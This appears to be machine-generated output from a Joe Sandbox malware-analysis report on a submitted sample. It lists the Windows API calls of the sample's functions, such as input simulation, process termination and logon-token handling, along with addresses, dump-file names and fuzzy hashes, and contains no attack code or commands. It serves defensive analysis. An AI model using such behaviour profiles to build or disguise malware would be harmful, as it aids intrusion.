                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 8e75ba04ca9a03b7e2ee3e4ea0748db7a5b97683eb622a124d5afe09a5fc0004
                                                        • Instruction ID: 4c3a56406c8ffe4e0ce27c650e117ecd3d10fe43908f8773367e59fa040e47c7
                                                        • Opcode Fuzzy Hash: 8e75ba04ca9a03b7e2ee3e4ea0748db7a5b97683eb622a124d5afe09a5fc0004
                                                        • Instruction Fuzzy Hash: A6513731208240AFC716EF64C885E6FBBE9FF89714F04491DF5958B2A2DB31E905CB52
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 003C57FB
                                                        • GetMenuItemCount.USER32(00000000), ref: 003C5832
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C585A
                                                        • GetMenuItemID.USER32(?,?), ref: 003C58C9
                                                        • GetSubMenu.USER32(?,?), ref: 003C58D7
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 003C5928
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 6d6629b356292d0812f6bf1791ec40d4ba85273cec2bbadd905124bfa671908e
                                                        • Instruction ID: 162d588baeb01828b7600537bc19a63ebe098b80ec58203b7a4d34aae1376ee8
                                                        • Opcode Fuzzy Hash: 6d6629b356292d0812f6bf1791ec40d4ba85273cec2bbadd905124bfa671908e
                                                        • Instruction Fuzzy Hash: 58515B31E00A15AFCF16EF64C845EAEB7B5EF48320F114069E806EB351CB75BE818B90
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0039EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0039EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0039EFD3
                                                        • _memmove.LIBCMT ref: 0039EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0039F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0039F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 5756f13310bccf14ddb384477d76ef14b0ac6f08f4553369dec0bbf9a5a166bc
                                                        • Instruction ID: 7a35f5d995c0ac27335a7a58ed45bc80bc81253bbedcc89bbeeded9ccebec2da
                                                        • Opcode Fuzzy Hash: 5756f13310bccf14ddb384477d76ef14b0ac6f08f4553369dec0bbf9a5a166bc
                                                        • Instruction Fuzzy Hash: 465168B5A00209EFCB15DF58C880AAAB7B9FF4C314F15856AE959DB301E735E911CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 003A2258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A22A3
                                                        • IsMenu.USER32(00000000), ref: 003A22C3
                                                        • CreatePopupMenu.USER32 ref: 003A22F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 003A2355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003A2386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                                        • Instruction ID: 7430671c24e8b5ed4fcdad0280fbafc6394564f600de0aaf701ccfd623c790b0
                                                        • Opcode Fuzzy Hash: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                                        • Instruction Fuzzy Hash: FC51983460020AEFDF26CF68C888BAEBBF9EF47314F154229E851AB2D0D7759904CB51
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0034179A
                                                        • GetWindowRect.USER32(?,?), ref: 003417FE
                                                        • ScreenToClient.USER32(?,?), ref: 0034181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0034182C
                                                        • EndPaint.USER32(?,?), ref: 00341876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: 0108e5aeb9e0c21d04e1b79d729c54d245060166f70a1b1179051d267ba3c555
                                                        • Instruction ID: bb344da1bb468e1da3465bca1ce24902c3e2791dbb219fc9d884eaf13d898f7d
                                                        • Opcode Fuzzy Hash: 0108e5aeb9e0c21d04e1b79d729c54d245060166f70a1b1179051d267ba3c555
                                                        • Instruction Fuzzy Hash: EF418F31104A04AFD712DF25C884FAB7BE9EB49724F144669F998DB1A1C730A885DB62
                                                        APIs
                                                        • ShowWindow.USER32(004057B0,00000000,00C4D508,?,?,004057B0,?,003CB5A8,?,?), ref: 003CB712
                                                        • EnableWindow.USER32(00000000,00000000), ref: 003CB736
                                                        • ShowWindow.USER32(004057B0,00000000,00C4D508,?,?,004057B0,?,003CB5A8,?,?), ref: 003CB796
                                                        • ShowWindow.USER32(00000000,00000004,?,003CB5A8,?,?), ref: 003CB7A8
                                                        • EnableWindow.USER32(00000000,00000001), ref: 003CB7CC
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003CB7EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                                        • Instruction ID: 50835289e1f23436f68cbe1947e45ed6abf2346f6ec270d4f892dd930ad6c5d0
                                                        • Opcode Fuzzy Hash: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                                        • Instruction Fuzzy Hash: BD412834600240AFDB26DF24C49AF94BBA1FF45350F1981A9ED48CF6A2C731AC56CB61
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,003B4E41,?,?,00000000,00000001), ref: 003B70AC
                                                          • Part of subcall function 003B39A0: GetWindowRect.USER32(?,?), ref: 003B39B3
                                                        • GetDesktopWindow.USER32 ref: 003B70D6
                                                        • GetWindowRect.USER32(00000000), ref: 003B70DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003B710F
                                                          • Part of subcall function 003A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                                        • GetCursorPos.USER32(?), ref: 003B713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B7199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: debbdde7eb32d9fae3202d72b51172fd962f3caf6126dccfda8cf355742e85ea
                                                        • Instruction ID: f9b1bc79556e3ad5a63cb950e107a851b169f88f747c8368c6d7cdc51d6481f5
                                                        • Opcode Fuzzy Hash: debbdde7eb32d9fae3202d72b51172fd962f3caf6126dccfda8cf355742e85ea
                                                        • Instruction Fuzzy Hash: B531A172509305AFD721DF14C849F9BB7AAFBC9314F000919F68597191CB70EA09CBA2
                                                        APIs
                                                          • Part of subcall function 003980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003980C0
                                                          • Part of subcall function 003980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003980CA
                                                          • Part of subcall function 003980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003980D9
                                                          • Part of subcall function 003980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003980E0
                                                          • Part of subcall function 003980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003980F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0039842F), ref: 003988CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003988D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 003988DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 003988F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0039842F), ref: 0039890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00398911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 130a8610648f42ce9a49214d4b9cce840f9edf5e0aefbdd3725ec6f09c6e49c5
                                                        • Instruction ID: 8661dee3f94b4e7f2f1da579d4a9683f4f8ab6f69b079e0dbb9bd07fc6d6eacd
                                                        • Opcode Fuzzy Hash: 130a8610648f42ce9a49214d4b9cce840f9edf5e0aefbdd3725ec6f09c6e49c5
                                                        • Instruction Fuzzy Hash: F5117F71511609FFDF129FA4DC09FBE7BADEB86315F154029E845D7210CB32A944DB60
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003985E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003985E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003985F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00398603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00398632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00398646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                                        • Instruction ID: 8683c495b74c872aa4341a01941fdb0bec93e2e37d3567226fe91898d1af2644
                                                        • Opcode Fuzzy Hash: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                                        • Instruction Fuzzy Hash: 881147B2500249AFDF029FA4DD49FEA7BADEB49344F054065FE05A2160C6729D64EB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0039B7B5
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0039B7C6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0039B7CD
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0039B7D5
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039B7EC
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0039B7FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                                        • Instruction ID: 267cf66d62a28af620f77d2b63760bd111dbfa897bcccb69a5dd0b8e5c6b1a60
                                                        • Opcode Fuzzy Hash: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                                        • Instruction Fuzzy Hash: 68017175A00219BFEF119BE69D45E5EBFADEF48711F004065FA04E7291D631AC10CF90
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 0036019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003601A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003601B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 003601B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003601C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                                        • Instruction ID: 6d8291223c248a1e40a0e8ccb5bc3aebd7abba42d72e2ef283b63d481a51eb77
                                                        • Opcode Fuzzy Hash: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                                        • Instruction Fuzzy Hash: E3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A864CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003A53F9
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003A540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 003A541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A5437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                                        • Instruction ID: 3ab8c71ac920b7e17b54dfd0832011a50286e04ab5f6848cfd2d161847f9abc6
                                                        • Opcode Fuzzy Hash: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                                        • Instruction Fuzzy Hash: 4EF03032241558BFE7225BA2DC0EEEF7B7DEFCAB11F040169FA05D1051D7A12A1187B5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 003A7243
                                                        • EnterCriticalSection.KERNEL32(?,?,00350EE4,?,?), ref: 003A7254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00350EE4,?,?), ref: 003A7261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00350EE4,?,?), ref: 003A726E
                                                          • Part of subcall function 003A6C35: CloseHandle.KERNEL32(00000000,?,003A727B,?,00350EE4,?,?), ref: 003A6C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A7281
                                                        • LeaveCriticalSection.KERNEL32(?,?,00350EE4,?,?), ref: 003A7288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                                        • Instruction ID: 14b4ddf1fade90ce303a5de8a90e7adf1b6a1686d65e0e562a5dc9ed05add198
                                                        • Opcode Fuzzy Hash: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                                        • Instruction Fuzzy Hash: C1F03A3A540612AFE7131B64ED8CEDA773EEF45712F150932F602D50A0CB766801CB50
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0039899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 003989A9
                                                        • CloseHandle.KERNEL32(?), ref: 003989B2
                                                        • CloseHandle.KERNEL32(?), ref: 003989BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 003989C3
                                                        • HeapFree.KERNEL32(00000000), ref: 003989CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                                        • Instruction ID: 2b54b5f2ea5485ab74f8bfab3cac73a19d546e8d02d729d5aecd0aec00f3796d
                                                        • Opcode Fuzzy Hash: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                                        • Instruction Fuzzy Hash: D5E05276104505FFDA022FE6EC0CD5ABB6EFB89762B548632F219C1470CB32A461DB50
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 003976EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,003CFB80,000000FF,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397727
                                                        • _memcmp.LIBCMT ref: 00397748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID: ,,=
                                                        • API String ID: 314563124-2941206825
                                                        • Opcode ID: 15d5c619430c0e9eb80e5a0d9a7deae6c5c663ec617f47d3041ab09ce90d47d8
                                                        • Instruction ID: 2f8199459b4b68227ff3cd27c7b874f22e1ead26db16a9615d44dbf56e00dffe
                                                        • Opcode Fuzzy Hash: 15d5c619430c0e9eb80e5a0d9a7deae6c5c663ec617f47d3041ab09ce90d47d8
                                                        • Instruction Fuzzy Hash: E281E975A10109EFCF05DFA4C984EEEB7B9FF89315F204558E506AB290DB71AE06CB60
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 003B8613
                                                        • CharUpperBuffW.USER32(?,?), ref: 003B8722
                                                        • VariantClear.OLEAUT32(?), ref: 003B889A
                                                          • Part of subcall function 003A7562: VariantInit.OLEAUT32(00000000), ref: 003A75A2
                                                          • Part of subcall function 003A7562: VariantCopy.OLEAUT32(00000000,?), ref: 003A75AB
                                                          • Part of subcall function 003A7562: VariantClear.OLEAUT32(00000000), ref: 003A75B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
